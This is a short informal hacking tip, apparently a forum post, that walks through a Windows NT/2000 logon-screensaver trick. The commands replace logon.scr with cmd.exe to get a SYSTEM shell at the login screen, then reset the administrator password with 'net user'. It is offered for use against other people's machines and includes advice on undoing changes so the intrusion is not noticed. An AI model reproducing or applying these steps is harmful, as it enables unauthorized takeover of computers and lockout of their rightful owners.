This is straight for a brain child. It makes so much sense that no one ever thought to do it.
Enjoy. Also beware to change what you have done. Or any machine that you did the hack on will
show what you did when the screen saver comes up. The only hard part is finding your way to C:\prompt or ms-dos. So begin.
If you can log in as an account , drop to DOS start -> run -> cmd, at the C: prompt type the following (assuming default install locations)
C:\> cd \winnt\system32
C:\winnt\system32> copy logon.scr logon.scr.old
C:\winnt\system32> del logon.scr
C:\winnt\system32> copy cmd.exe logon.scr
Now log off the machine, logon.scr is the screen saver that will kick in after 15 minutes of not touching the keyboard/mouse at the logon screen. Wait 15-20 minutes and a DOS prompt with FULL SYSTEM rights will pop up, then just to
C:\> net user administrator <newpassword>
and then log in with the new account.
Try this, might work, as long as he didn't change default permissions on C:\winnt and C:\winnt\system32 you should be golden.